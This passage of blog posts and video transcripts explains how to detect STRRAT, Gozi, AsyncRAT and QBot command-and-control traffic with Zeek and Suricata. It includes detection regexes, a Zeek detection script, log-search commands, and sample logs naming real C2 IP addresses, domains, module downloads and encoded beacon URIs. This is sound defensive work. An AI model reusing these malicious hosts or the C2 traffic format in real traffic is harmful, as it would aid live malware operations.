they probably will. There’s a lot of tools out there for malware analysts. You can try to decrypt things and, you know, do a complete separate analysis outside of Zeek that you would need this information that Zeek gives you. So, even if this does if you’re not a malware analyst, you look at this thing like why would I want that?

00:08:44:25 – 00:09:19:07
Dr. Keith Jones
There are people that would get this and go, oh, I got the payload. I know exactly what this malware did, and if it was encrypted, they could try to decrypt it and all that stuff. Now, I’m not going to try to pretend to be an expert in Suricata rules. We’ve got experts inside Corelight for that. Travis Green, he wrote these Suricata rules and he took my Zeek logic and basically put it on steroids for Suricata because he not only detected the ping command that we talked about earlier, but he looked for this up an exec command, which is a separate command as well, and wrote a signature for that.

00:09:19:09 – 00:09:43:15
Dr. Keith Jones
And then he also worked for distinct class names in a jar file, which a Jar file is a Java file. So because that’s got computer instructions in it, we can search it. And when he knew that this particular name shows up in there and he made a signature for it, he also went into the leaked source code for the malware itself.

00:09:43:15 – 00:10:13:12
Dr. Keith Jones
And notice that there’s a license that gets checked, because a lot of times, malware authors are not the same people that deploy the malware to the victims. So those people buy the malware from the malware authors and you got to license it. Well, he keyed in on that check and figured out a signature for that. And then he also keyed in on, I don’t want to say it’s a reconnaissance check, but when a malware infects a victim, a lot of times it’ll check what its IP address is and where it is in the world.

00:10:13:12 – 00:10:41:17
Dr. Keith Jones
It just gets its bearing straight. And it goes to this website called IP API. And humans could go there and pull their IP information. But this malware does it with a something different that humans and other malware don’t use. It uses a specific user agent string. And once we see that user agent string going to that domain of IP API dot

00:10:41:17 – 00:11:08:22
Dr. Keith Jones
com, now we know that that’s a STRRAT candidate that we’re possibly looking at. So what Travis did, he wrote a rule that would actually detect that, user agent string going to that website. So one of the very possible things that happens in the wild is malware is created on day one. Six months go by. Now the security world found out about it.

00:11:08:23 – 00:11:38:22
Dr. Keith Jones
We all went, oh God, we got to write a C2 analyzer for this thing, just like I just showed you. Right? So in that gap in that six months, people could have been infected. Right? And we don’t have a detector that’s actively watching the network before in that six months. But if you have Zeek running and there are Zeek logs historically for you, you can take some of that signature, some of those signature artifacts that Travis put into Suricata rules,

00:11:38:24 – 00:11:59:29
Dr. Keith Jones
and you can actually search your logs historically looking for some of those signatures. And another one of our researchers, Simeon, he went in and wrote a, a SEIM search. And specifically what you’re seeing on your screen is LogScale. But if you’re a Splunk user, you can translate this over to your platform of however you search logs.

00:12:00:01 – 00:12:24:10
Dr. Keith Jones
Me personally, I use the find command and I crawl a file system and I look for TSV logs and I search for these things. So whatever your flavor of your tool is, take this meat and plug it in appropriately. Okay. And let me put on a screen. This is our just internal LogScale example on this pcap that we’re showing you that hit.

00:12:24:13 – 00:12:37:09
Dr. Keith Jones
So if this is a real network and you’re running LogScale you’re dumping your Zeek logs into it, and you ran this query that we gave you, this is a high probability that this could be a STRRAT connection.

00:12:37:09 – 00:12:47:08
Dr. Keith Jones
All right. So with that I hope you walk away from this and you say you know what my network a little more secure against STRRAT.

00:12:47:13 – 00:13:08:26
Dr. Keith Jones
And I have more mechanisms now to detect if STRRAT was on my network now, at least I can tell what it did right. I got the log and I got the payloads. If there was anything, I. I try to keep these videos as short as possible because there’s a lot of details in here. I know I skipped some details, I know I did so if there’s anything in here where you go, I totally didn’t understand that,

00:13:09:01 – 00:13:24:27
Dr. Keith Jones
just put it in the comments of the video and I’ll try to answer it. Anytime anybody asks me questions like this, I try to answer them the best that I can. So if there was anything that was unclear, please do feel free to put the down there and I’ll I’ll try to answer it and then other people will catch it too.

00:13:25:00 – 00:13:39:04
Dr. Keith Jones
And with that, I hope you enjoyed this and I hope you come back. And I think Agent Tesla will probably probably be the next one that I produce for this video. So I hope you come back and check that one out. See you then.

00:13:39:05 – 00:13:49:23

The post Detect STRRAT Malware With Zeek And Suricata first appeared on DrKeithJones.com.

Corelight Blog: https://corelight.com/blog/gozi-banking-malware

Transcript:

00:00:10:47 – 00:00:41:11
Old Grizzled FBI Agent
Hi there. This is your favorite obligatory grizzled FBI agent again. You may wonder why I have my gun out. And this pair of binoculars. They’re here for my and your protection. Hah hah hah hah hah hah hah. Listen, I’m here to talk to you about a real serious subject. The Gozi banking malware family. Once again, the fine folks over at a company named Corelight,

00:00:41:15 – 00:01:05:45
Old Grizzled FBI Agent
they put together a blog on how to detect this malware family using Zeek. Zeek is an open source tool you can use to analyze your network data. So what you can do is you can write scripts to analyze your network data and look for signs of Gozi banking malware C2 traffic. I have a buddy over at Corelight Labs and his name is Keith Jones.

00:01:05:50 – 00:01:29:41
Old Grizzled FBI Agent
He has a podcast and it talks about electronic true crime cases. One of his episodes, he was covering the Gozi banking malware group. And after he was done, he wondered if he could detect that malware C2 on the network. And if you haven’t checked out his podcast, I’ll put a link here so you can go to the episode where I show up and I get to swear at the criminal.

00:01:29:46 – 00:01:53:38
Old Grizzled FBI Agent
It’s great, great stuff. I really recommend you check it out. All right, let’s get back to Gozi here. Then Doctor Jones went over to a website called Malware Traffic Analysis. And this is a really good website where they pick apart different types of malware and they give you the PCAPs, which are file representations of the network traffic when that malware was executed.

00:01:53:42 – 00:02:26:24
Old Grizzled FBI Agent
Now, according to the notes from malware traffic analysis, there are two types of traffic in Gozi C2 communications. The first is a really long URL over HTTP that is basically base64 string encoded, plus a little extra that we’ll talk about here in a minute. The other type of traffic, well, they’re accessing these files that look like RAR files.

00:02:26:24 – 00:03:03:42
Old Grizzled FBI Agent
And you’ll see VNC rar this other one that I probably can’t even pronounce correctly in the middle called stilak and then one at the bottom down there called cook. And then they have different versions with 32 and 64. So for instance you have VNC 32 dot RAR, A VNC 64 dot RAR. Keith was telling me that he thought it would be too simple to search for these RAR files to find this malware, but when they searched their customer historical logs every time these RAR files were observed, there was malware involved!

00:03:03:47 – 00:03:31:18
Old Grizzled FBI Agent
So this is one method that Corelight will use to detect the Gozi banking malware. Now let’s address these really long base64 encoded URLs I talked about previously. Now these really long URLs that are base64 encoded, they usually start with a directory that is a normal English word like uploaded. Now uploaded is what we’re going to use in the example here,

00:03:31:18 – 00:03:57:46
Old Grizzled FBI Agent
but we see in other words used out in the wild. Now another thing Gozi will do is throw in random forward slashes to make it look like a normal URL. These forward slashes in the end, Gozi will just throw them out. Now base64 has four characters a plus, a forward slash, a new line, and a carriage return that are encoded a little differently in the URL.

00:03:57:51 – 00:04:33:39
Old Grizzled FBI Agent
Gozi encodes them as a underscore two b, underscore two f, underscore zero a, and underscore zero d. So if you put all that information together you get a regular expression kind of like this. Now Gozi will use a lot of forward slashes where most normal URLs will not. If we put a condition to see at least ten forward slashes on our regular expression, that’ll help eliminate any false positives that we see in practice.

00:04:33:44 – 00:05:00:53
Old Grizzled FBI Agent
Use this command to search all your Zeek logs for Gozi, assuming you save your Zeek logs in t s v format. Next in this blog, Corelight shows you the Zeek code that they wrote so you could detect Gozi live on your network as it happens. Now it looks like a lot of source code, and it is. But there’s only two things you really need to know.

00:05:00:58 – 00:05:34:54
Old Grizzled FBI Agent
The first is here are the two regular expressions that I discussed earlier that will cover the RAR files and the long base64 encoded URLs. The second thing you need to know is we’re only handling the HTTP request event, and once we match these regular expressions that I just discussed inside this event, we fire a notice and we write the Gozi malware payload to a Gozi dot log.

00:05:34:59 – 00:05:59:14
Old Grizzled FBI Agent
Now you’ll notice in the code here that Corelight has put a check in for entropy and says the payload has to have entropy of at least four. This is because Gozi’s payload is encrypted and encrypted data has higher entropy. And your next question should be hey grizzled FBI agent, are there any variants of Gozi that this logic will detect?

00:05:59:19 – 00:06:21:37
Old Grizzled FBI Agent
And the answer is yes. Here’s a half dozen here. And there are probably more variants out there that we don’t even know about. So this logic will detect other malware families that have them based upon Gozi. Now, if you install the Zeek code at this link and then you run it on the PCAP that we discussed earlier, you’re going to get a Gozi dot log like this.

00:06:21:42 – 00:06:49:33
Old Grizzled FBI Agent
And you can see the colored areas here, this is the Gozi payloads that we talked about earlier. You can see the base64 encoded URLs here. And then you can see the RAR files down here. So all of this is clearly Gozi traffic. And if you open your notices log you’ll find some detections in there as well. You can see they’re very similar to the Gozi dot log that I just showed you earlier.

00:06:49:38 – 00:07:06:24
Old Grizzled FBI Agent
And before we conclude please like and subscribe. Okay. Well, this old grizzled FBI agent wants to thank you for checking out my video. I really hope you come back and you check out one of my other videos soon. Thanks. Bye.

The post Detect Gozi Banking Malware With Zeek! first appeared on DrKeithJones.com.

Corelight blog: https://corelight.com/blog/newsroom/news/hunt-of-the-month-detecting-async-rat-malware

Zeek: https://zeek.org/ Source code: https://github.com/corelight/zeek-asyncrat-detector

Transcript:

00:00:00:10 – 00:00:31:31
Grizzled FBI Agent
Hello. I’m your obligatory grizzled FBI agent. Never mind this gun and binoculars I have in my hand. These are just for my, and your, protection. Listen, I’m here to talk to you about a very serious subject: AsyncRAT. AsyncRAT is a malware family, and it uses HTTPS, which is encrypted to communicate with its command and control servers.

00:00:31:36 – 00:00:59:59
Grizzled FBI Agent
Now, usually that makes it very hard to detect, but there are some fine folks over at a company named Corelight that make a network sensor, and they have figured out how to detect this AsyncRAT. Let me show you how they did it. From now on, I’m going to be saying we. And you may wonder why. Well, I’m that close with the folks over at Corelight, and they invited me over to check out what they were doing.

00:00:59:59 – 00:01:33:01
Grizzled FBI Agent
So let me show you what they did. Okay. So the first thing that we did is we went to an online malware sandbox service called any dot run, and we found several samples of AsyncRAT there. Then, we downloaded the PCAPs, which are files of the network traffic when these malware samples were executed there. So we studied these PCAPs and we figured out, and I hope you bought a hat and you’re holding on,

00:01:33:06 – 00:01:59:04
Grizzled FBI Agent
AsyncRAT will announce itself when it communicates over HTTPS. Sounds pretty unbelievable, doesn’t it? Well, let me show you how it does this. The folks over at Corelight, they help maintain an open source project named Zeek. And I’ll put a link in the description here so you can go to that if you want to check it out. Zeek is an application to analyze your network data.

00:01:59:08 – 00:02:28:53
Grizzled FBI Agent
So you can write scripts in Zeek to detect things like AsyncRAT. Now when you run this PCAP through Zeek you’re going to get a log called the X509 dot log. And this is the log that describes the SSL certificates that go across that HTTPS encrypted connection that I talked about earlier. Now I don’t mean to brag, but I am friends with one of the people on Corelight Labs.

00:02:28:58 – 00:03:01:37
Grizzled FBI Agent
So he was telling me that when they discovered this, it about knocked them over. Look at this. You see this string over here? This AsyncRAT malware literally announces itself in the SSL certificates. And we can see that in Zeek’s X509 dot log. And immediately you should be asking me, hey, grizzled FBI agent, why does this malware announce itself?

00:03:01:41 – 00:03:38:07
Grizzled FBI Agent
Well, it’s because this malware is actually open source, meaning that anybody can go out there and grab the source code of this malware. And typically what people will do is they will compile this malware into an executable that runs on a computer, but they won’t change these default certificates that announce the malware as AsyncRAT. You would think this didn’t happen at all in practice, but my buddy over in Corelight Labs said he ran this detector on several customer networks and found hits. Lots of hits.

00:03:38:12 – 00:04:12:05
Grizzled FBI Agent
It’s important to note that when you detect AsyncRAT in this method, you’re going to be able to detect other variants that were based on AsyncRAT. There’s other variants out there named DCRat or SXN and Corelight notes this in their blog. Now my buddy over at Corelight also told me that even if I’m just running Zeek and I have historical logs, I can run commands like these and search my historical logs for any instances of the AsyncRAT server.

00:04:12:10 – 00:04:33:37
Grizzled FBI Agent
And you notice in this line that the signature is a little more complicated than just looking for AsyncRAT because we’re also looking for the variants like DC Rat and SXN. If you’re one of the fortunate people that keep your logs indexed, Corelight gives you some SIEM searches as well. So let’s get right down to it, shall we?

00:04:33:42 – 00:04:57:43
Grizzled FBI Agent
This is the Zeek code that Corelight released. Now it might look like a lot of code, but there’s really only two things you need to know out of this. The first is they’re looking at the SSL establish event. So they’re handling any of the HTTPS connections that we talked about earlier. The second is this is the regular expression that they’re looking for in the server certificate.

00:04:57:47 – 00:05:26:27
Grizzled FBI Agent
You can see all the AsyncRAT, DC and SXN markings that we talked about earlier. Lastly, when this regular expression is found in the SSL certificate, a notice will be generated. So you can go to your notice dot log and look at the line there. And it will tell you all about the AsyncRAT detection. If you’re not able to run Zeek and you have Suricata, you might be looking at this and saying ah crap.

00:05:26:32 – 00:05:51:48
Grizzled FBI Agent
Well, we got a solution for you too, so don’t worry. We wrote a Suricata rule that looks like this that basically does the same type of detection that we put together in Zeek, except it just uses the Suricata engine instead. Thank you for spending time today with this old grizzled FBI agent. Together. We can help fight against AsyncRAT.

00:05:51:53 – 00:05:57:03
Grizzled FBI Agent
I hope to see you again on one of our next videos.

The post Detecting AsyncRAT Malware C2 With Zeek And Suricata first appeared on DrKeithJones.com.

https://docs.zeek.org/en/master/script-reference/log-files.html

Clicking on “Conn:Info” will send you to the conn.log format specification, for example. Now you can quickly see all the possible values of “conn_state” or decipher the meaning behind the “history” field.

This is much faster than looking at Zeek script to find record definitions!

Transcript:

00:00:00:00 – 00:00:20:24
Keith
Hey, welcome. My name is Keith Jones, and I’m going to walk you through a cheat sheet that I use to find the format of Zeek default logs. Now, what I’m going to do is put this website that I have on your screen right now, I’m going to put this in the description so that way you can go directly to it.

00:00:20:26 – 00:00:45:27
Keith
Now, what this is, is it’s a web page on the Zeek Documentation website and it outlines all the different default logs that Zeek can log. If you just install vanilla Zeek. Now, as you scroll down this list, you can see it’s pretty long. I mean, there’s a lot of things it supports in here by default, but what you might not know is you can click on this right here column.

00:00:45:28 – 00:01:11:05
Keith
So for instance, they conn log, which is the most popular log, has some fields in it, like can state or history. I always forget what they are, so I need to go look them up in glossary of sorts and this is where you can find it. So if you just click on there, that field description, you can see now we have all the fields to the conn log.

00:01:11:08 – 00:01:34:20
Keith
And like I said earlier, if you’re interested in conn state, I’ll scroll down here for you and you can see it’s right there. And here’s all the different kind states you could see there. Pretty cool. Human language, too. And if you’re interested in history, I can never remember what the tokens are here. Scroll down. You got the history field, and here’s all the different letters and what they mean.

00:01:34:22 – 00:01:39:22
Keith
So that way you can decipher a history field, a lot faster than before, hopefully.

00:01:39:22 – 00:02:04:06
Keith
And again, I’ll take this website and I’ll put it in the description so that way you can just get to this very quickly. So with that, it was just a very, very fast update of a website I wanted to share because this is a website that I use sometimes daily, but definitely several times a week when I have to look up things and I wanted to pass it along since I use it so much.

00:02:04:12 – 00:02:11:14
Keith
So I’ll be appreciate it and I hope you’ll join me on one of my other Zeek videos soon. Thanks. Bye.

The post Zeek Log Format Cheat Sheet first appeared on DrKeithJones.com.

I took a look at the following PCAPs from this family of malware, hoping to make it into a Zeek Roulette:

• https://www.malware-traffic-analysis.net/2022/12/09/index.html
• https://www.malware-traffic-analysis.net/2022/10/14/index.html
• https://www.malware-traffic-analysis.net/2022/09/29/index.html
• https://www.malware-traffic-analysis.net/2023/01/31/index.html
• https://www.malware-traffic-analysis.net/2023/04/03/index.html
• https://www.malware-traffic-analysis.net/2023/03/31/index.html

You will see that in each of the malware write ups, and in the PCAPs, that the malware C2 is sent across HTTPS. That limits our ability to detect the raw C2.

Initially, I thought I could potentially use the JA3/JA3S hashes in Zeek to identify C2 clients and servers through their HTTPS parameters.

I specifically looked at: https://www.malware-traffic-analysis.net/2023/03/31/index.html and the C2, according to the notes downloaded from that link, happens over TCP 2222 and 443. The JA3 and J3S are:

72a589da586844d7f0818ce684948eea

fd4bc6cea4877646ccd62f0792ec0b62

I took these hashes and ran them across a large live network I am able to monitor. Specifically, I searched the ssl.log over the past week on this network. I got hits with the hashes separately (as if they were OR’d) that looked like legitimate SSL traffic, so I looked for the times when the JA3 and JA3S matched. In that case I saw a connection between a local network asset and McAfee, Inc. The probability is low that McAfee would have a C2 server, so I think this detection method may not work so well.

After finding a couple more hits that flagged connections where it looked like false positives, I don’t see how the JA3 analysis will identify this malware family.

I will continue to think on this one, but C2 like this over HTTPS is much more difficult to detect.

Additional Reading:

• https://www.elastic.co/security-labs/qbot-malware-analysis
• https://news.sophos.com/en-us/2022/03/10/qakbot-decoded/

The post Analyzing QBot/QakBot Malware With Zeek first appeared on DrKeithJones.com.

I had talked about Gozi malware in our eCrimeBytes podcast here:

Last Man From Gozi Banking Malware Group Sentenced To Three Years – eCrimeBytes Nibble #51

In my technical real life job at Corelight, I ran into a sample of the Gozi banking malware in the wild here:

https://malware-traffic-analysis.net/2023/07/12/index.html

You can download a PCAP of the infection from this link too. This is the same PCAP I used to develop this detection logic in Zeek.

According to the notes at Malware Traffic Analysis, the malware C2 information is summarized by:

GOZI/ISFB C2 TRAFFIC:

- 151.248.117.244 port 80 - diwdjndsfnj.ru - GET /uploaded/[long base64 string with backslashes and underscores].pct
- 151.248.117.244 port 80 - diwdjndsfnj.ru - POST /uploaded/[long base64 string with backslashes and underscores].dib
- 151.248.117.244 port 80 - diwdjndsfnj.ru - GET /uploaded/[long base64 string with backslashes and underscores].pmg
- 151.248.117.244 port 80 - iwqdndomdn.su - GET /uploaded/[long base64 string with backslashes and underscores].pmg
- 151.248.117.244 port 80 - iwqdndomdn.su - POST /uploaded/[long base64 string with backslashes and underscores].dib

GOZI/ISFB MODULES (ENCRYPTED DATA BINARIES):

- 91.199.147.95 port 80 - 91.199.147.95 - GET /vnc32.rar
- 91.199.147.95 port 80 - 91.199.147.95 - GET /vnc64.rar
- 91.199.147.95 port 80 - 91.199.147.95 - GET /stilak32.rar
- 91.199.147.95 port 80 - 91.199.147.95 - GET /stilak64.rar
- 91.199.147.95 port 80 - 91.199.147.95 - GET /cook32.rar
- 91.199.147.95 port 80 - 91.199.147.95 - GET /cook64.rar

At first I thought it would be too simple to detect this malware family through the RAR files it downloads, but after searching several customer networks I monitor for several months I found these RAR files to be unique to this malware! I chose to include these file names in my detection methodology by looking for the regular expression: /\/(stilak|cook|vnc)(32|64)\.rar$/

The other detection methodology is to look for long URLs that are base64 encoded in the unique manner Gozi uses. First, Gozi uses a real word for the first URL subdirectory. It is “uploaded” in the sample above, but I’ve seen other words used here. This word is unimportant to the malware and can be ignored for our purposes.

Then, Gozi will base64 encode the encrypted C2 data and add several random forward slashes to make it look like a URL. Gozi will eventually remove these slashes when it decodes this C2 string.

In addition, Gozi encodes the base64 “+”, “/”, “\n”, and “\r” characters as “_2B”, “_2F”, “_0A”, and “_0D”. Putting all of that information together leads us to a regular expression of: /^\/\w+\/([a-zA-Z0-9\/]|_\/?2\/?F|_\/?2\/?B|_\/?0\/?A|_\/?0\/?D){200,}\.[a-zA-Z0-9]+$/

However, I saw some rare collisions with the prior regular expression that look like false positives on a customer network. Therefore, I only alert on URLs that have at least 10 forward slashes. When I added this condition to my filter, the false positive collisions went away. The full Unix find command combining both detection methodologies follows (note, use gawk on MacOS):

find /logs -name "http*" | parallel -j 10 zcat {} :::: - | zeek-cut host uri | awk -F '\t' '$2 ~ /\/(stilak|cook|vnc)(32|64)\.rar$/ || ($2 ~ /^\/\w+\/([a-zA-Z0-9\/]|_\/?2\/?F|_\/?2\/?B|_\/?0\/?A|_\/?0\/?D){200,}\.[a-zA-Z0-9]+$/ && gsub(/\//, "/", $2) > 10)'

You will see this regular expression detects 94 lines in the Zeek http.log file for our PCAP sample above:

$ cat http.log | zeek-cut host uri | gawk -F '\t' '$2 ~ /\/(stilak|cook|vnc)(32|64)\.rar$/ || ($2 ~ /^\/\w+\/([a-zA-Z0-9\/]|_\/?2\/?F|_\/?2\/?B|_\/?0\/?A|_\/?0\/?D){200,}\.[a-zA-Z0-9]+$/ && gsub(/\//, "/", $2) > 10)' | wc -l
      94

We now need to move this logic into Zeek code so we can run it on a live sensor.

We will catch the URIs in Zeek’s HTTP request event. The HTTP request event is documented at:

https://docs.zeek.org/en/master/scripts/base/bif/plugins/Zeek_HTTP.events.bif.zeek.html#id-http_request

Translating the logic from the find command naturally leads us to the rest of the code here:

module GoziMalwareDetector;

export {
	## Log stream identifier.
	redef enum Log::ID += {
		LOG
	};

	## The notice when the C2 is observed.
	redef enum Notice::Type += {
		GoziActivity,
	};

	## Record type containing the column fields of the log.
	type Info: record {
		## Timestamp for when the activity happened.
		ts: time &log;
		## Unique ID for the connection.
		uid: string &log;
		## The connection's 4-tuple of endpoint addresses/ports.
		id: conn_id &log;
		## The Gozi C2 HTTP method.
		http_method: string &log &optional;
		## The Gozi C2 command, still encoded and encrypted.
		payload: string &log &optional;
	};

	## Default hook into Gozi logging.
	global log_gozi: event(rec: Info);

	## A default logging policy hook for the stream.
	global log_policy: Log::PolicyHook;
}

# Regex - make them globals so they are compiled only once!
global rar_regex = /.*\/(stilak|cook|vnc)(32|64)\.rar$/;
global b64_regex = /^\/[^[:blank:]]+\/([a-zA-Z0-9\/]|_\/?2\/?F|_\/?2\/?B|_\/?0\/?A|_\/?0\/?D){200,}\.[a-zA-Z0-9]+$/;

redef record connection += {
	gozi: Info &optional;
};

# Initialize logging state.
hook set_session(c: connection)
{
	if ( c?$gozi )
		return;

	c$gozi = Info($ts=network_time(), $uid=c$uid, $id=c$id);
}

function log_gozi_detected(c: connection)
{
	if ( ! c?$gozi )
		return;

	Log::write(GoziMalwareDetector::LOG, c$gozi);

	NOTICE([
	    $note=GoziMalwareDetector::GoziActivity,
	    $msg=fmt("Potential Gozi banking malware activity between source %s and dest %s with method %s and URI %s", c$id$orig_h, c$id$resp_h, c$gozi$http_method, c$gozi$payload),
	    $conn=c,
	    $identifier=cat(c$id$orig_h, c$id$resp_h)]);

	delete c$gozi;
}

event http_request(c: connection, method: string, original_URI: string,
    unescaped_URI: string, version: string)
{
	hook set_session(c);

	local uri: string = to_lower(unescaped_URI);

	# We use the entropy check below to throw out long "normal" URIs that might make it through our checks.
	# Since the underlying Gozi C2 data is encrypted, entropy should be higher than "normal".  I chose this threshold based upon empirical tests.
	if ( uri == rar_regex || ( unescaped_URI == b64_regex && count_substr(unescaped_URI, "/") > 10 && find_entropy(unescaped_URI)$entropy > 4 ) ) {
		c$gozi$http_method = method;
		c$gozi$payload = unescaped_URI;
		log_gozi_detected(c);
		return;
	}
}

event zeek_init() &priority=5
{
	Log::create_stream(GoziMalwareDetector::LOG, [
	    $columns=Info,
	    $ev=log_gozi,
	    $path="gozi",
	    $policy=GoziMalwareDetector::log_policy]);
}

After running my initial logic on a network for a while, I saw a handful of false positives with very deep URLs with many subdirectories.  Since Gozi C2 traffic is encrypted before it is base64 encoded, the entropy should be high on the C2 traffic.  Therefore, I added an entropy test on those base64 string candidates and only allow detections when the entropy is greater than 4 bits per character.

The next question becomes: How many of Gozi’s variants will this logic detect?

Good question.

I found some of the below variants of Gozi in Any.run, and when I spot checked the PCAPs Gozi was indeed detected:

• Ursnif
• Snifula
• ISFB
• Dreambot
• Papras
• sniful

You can view, download and install the full source code via Corelight’s repository here:

https://github.com/corelight/zeek-gozi-detector

Below are examples of Gozi detections in Zeek logs. These logs are also found in Readme.md in the link above.

gozi.log:

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	gozi
#open	2023-07-24-19-00-13
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	http_method	payload
#types	time	string	addr	port	addr	port	string	string
1689201023.169002	ClEkJM2Vm5giqnMf4h	10.7.12.121	49799	151.248.117.244	80	GET	/uploaded/8jvrTb2D/c4CxLmogLgZQGC_2FQ_2B2b/Ma3ylmhq8i/MeT_2Fmtq1zDpHZZQ/2OknTIetuvPf/SqlzkcwbzWM/aFx0b70stnXODu/WDQ2wUhiUaYRbirzPbAvc/2V_2Feb1BeDPQaU0/WZs_2FbMUKJ37c4/Gf5YYgB_2B8BS7mcYa/jECotoj7R/7bH1bkdIXbwbqpU0Nryv/_2BfEwnTZ0On333QjdJ/fdFWYGQpQofXObilmWG0P_/2BS5YP7Tcj18X/cQoSxxb6/FYqDyT3sva2N6amcI32HXsv/n6pffb_2FO/UxvFILD91uIk2oNQx/DEmgyRV_2FLi/3pF67pmCpVP/mFnn0G63A1Sv9N/05KeIqFG3zHYuPPOU/1P.pct
1689201024.619787	ClEkJM2Vm5giqnMf4h	10.7.12.121	49799	151.248.117.244	80	GET	/uploaded/IfjXSAQlkk/LWNR4tkuOMiXdy5H_/2F55TZ5Ulkmf/KZSJQNnlKNL/oXNw6o8qzjnHJh/42iAsB5AuQ8n_2FyMP9YN/iAK5Z4rM1kiabXH3/Tbf6F39oZk8a8mY/9CVAQTHkAlTev6Vstr/ir_2FniSr/BvZGpW5mVB5nr9pTRisy/xPxWcp7jW1doRbtDMhT/9qJZuk9sdFnLKTsj12Ald9/3B3TYfDuu18i7/7LNZfim3/7nt5T5HqNSKfJKcDB7vJpeR/BoPpPolfrA/Z_2F56SDXpQJw4TYJ/45pcw80raC9d/yeDiXFQDftm/RIxazSR_2BPJ0F/wL6l8KasDC6CAzVNLSL_2/F535_2BDNH1/tcGkkEMCZrS/i.pct
1689201025.545122	ClEkJM2Vm5giqnMf4h	10.7.12.121	49799	151.248.117.244	80	GET	/uploaded/MsY1SyBRpp3LKx93fMeITx/w33QoEW7tSfHh/8_2Fqcx1/mAOJzt3teF4AUCrc8IBMkbm/8laKdMc_2F/A0s_2B6tfYEvyAcP_/2Bk_2Buvkjcq/80G4xrhnFAN/TCW76WZrbPDSMY/_2FhKbl7f8pmHGBET0Y_2/BvcMUzja7B7xdYYK/qwpg5fbrMu6AsJ8/Dejh0cXcFfYe8h75Yx/Fn3LZFhMy/29bQzFKZyZHoHgfyV1XJ/Lw1D14ehZUiPYfQxTWv/LlBNcxqMhthgso7PYl8tLq/JhO8H_2FKdEez/1uHkLyhp/SD1X5u0VHgJvzUkDhpUUhKb/Q6cyGyHP3A/UPnKN8bJKuY7qHpRC/r94GeIuEWP3a/G9Zo2.pct
1689201032.086164	C4J4Th3PJpwUYZZ6gc	10.7.12.121	49800	151.248.117.244	80	GET	/uploaded/DjeJ0blPQ/_2BkfrDEoFQgD04wO2F7/Ojqqobto35jEVZ1IQyU/G7zu4_2BFUfhIMJcKkibbg/fjjRaEElICvmR/e5DoJnsG/vsx3T8eOiuXp0AlWknwttvf/A_2FrNprrb/bHnMsv4916Q0BUf_2/B3XIECBmUK_2/FW3G5XPXaPV/ySf6P_2BIXQe7C/q0IvZNIlHZt2c8lCjnMGY/BP81zPWMMzAUn3VS/Y_2BCg7CLJsM0vz/MloZ0Th38yNZOadE6L/qwrs9PKza/13Lw9jqWnbyh08rIXwcG/mMM0HdBwcj6NPi6_2FH/5qnQe2GM1T/ZuHEvxYT/j.pmg
1689201032.792223	CtPZjS20MLrsMUOJi2	10.7.12.121	49801	91.199.147.95	80	GET	/vnc32.rar
1689201033.823106	CtPZjS20MLrsMUOJi2	10.7.12.121	49801	91.199.147.95	80	GET	/vnc64.rar
1689201045.338855	C4J4Th3PJpwUYZZ6gc	10.7.12.121	49800	151.248.117.244	80	POST	/uploaded/3lFSQwjxUfg8HgrTtqSS/ZKopMRdt0Jtv6ehOunO/ppBgdtF3YUX5Co9W0vX2OQ/UNZWu2BHmWHLi/4Pta3IUW/h8js8gl66mR4P51kp_2B1rV/l_2BDjFJoW/DhHjLJGFTtgPfY5qz/0jnqt8GbX_2F/M2R1QPMjPhA/1LDVR2FItKJXdJ/1qIKPwGyBNh80d_2BqfF_/2F6OR9A8MzQ8A1Mu/qqkL0hlaa4U4qkx/TrAV_2BpGP_2B6FnQc/TZAppMESi/SnlO5AU6khpDGRiOveBi/R4uVGlbArQZk3cDBamb/rekwL.dib
1689201092.103798	C37jN32gN3y3AZzyf6	10.7.12.121	

...	

/uploaded/VcSCrD_2F_2/BKyBAIxpStofT6/txC4Pni9EG_2BFbKqUx_2/Fw9s4Zg2fwdtvoMJ/Fr6UyR1uP9PRBN1/FQZ6hz6Mb_2Fs_2F49/_2BkvjXF7/w8MfT_2B32RaOM5ijT_2/BzGKFuqMa5OzlLI_2BT/A_2FGOoDi_2FP_2F8zb2Yr/pIb51vNHV25_2/BGIXUCRW/oMLsPVA84EAhSj9fCXt0ilY/Cxf2YThLeu/NIEKMHtLXO5SEVrsR/EHwwPqidwENp/fDqtP7kFnSX/5o3VYS7mpe5E1c/x6KP6J7oE0yDXxAJaeyUe/6JuH70X_2Fjs56xO/bGXUaoK1Jmw6y_2/FvqA1eXlmviDm7Rk39/4JHyQ0dF/t.pmg
#close	2023-07-24-19-00-14

notice.log:

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	notice
#open	2023-07-24-19-00-13
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	fuid	file_mime_type	file_desc	proto	note	msg	sub	src	dst	p	n	peer_descr	actions	email_dest	suppress_for	remote_location.country_code	remote_location.region	remote_location.city	remote_location.latitude	remote_location.longitude
#types	time	string	addr	port	addr	port	string	string	string	enum	enum	string	string	addr	addr	port	count	string	set[enum]	set[string]	interval	string	string	string	double	double
1689201023.169002	ClEkJM2Vm5giqnMf4h	10.7.12.121	49799	151.248.117.244	80	-	-	-	tcp	GoziMalwareDetector::GoziActivity	Potential Gozi banking malware activity between source 10.7.12.121 and dest 151.248.117.244 with method GET and URI /uploaded/8jvrTb2D/c4CxLmogLgZQGC_2FQ_2B2b/Ma3ylmhq8i/MeT_2Fmtq1zDpHZZQ/2OknTIetuvPf/SqlzkcwbzWM/aFx0b70stnXODu/WDQ2wUhiUaYRbirzPbAvc/2V_2Feb1BeDPQaU0/WZs_2FbMUKJ37c4/Gf5YYgB_2B8BS7mcYa/jECotoj7R/7bH1bkdIXbwbqpU0Nryv/_2BfEwnTZ0On333QjdJ/fdFWYGQpQofXObilmWG0P_/2BS5YP7Tcj18X/cQoSxxb6/FYqDyT3sva2N6amcI32HXsv/n6pffb_2FO/UxvFILD91uIk2oNQx/DEmgyRV_2FLi/3pF67pmCpVP/mFnn0G63A1Sv9N/05KeIqFG3zHYuPPOU/1P.pct	-	10.7.12.121	151.248.117.244	80	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
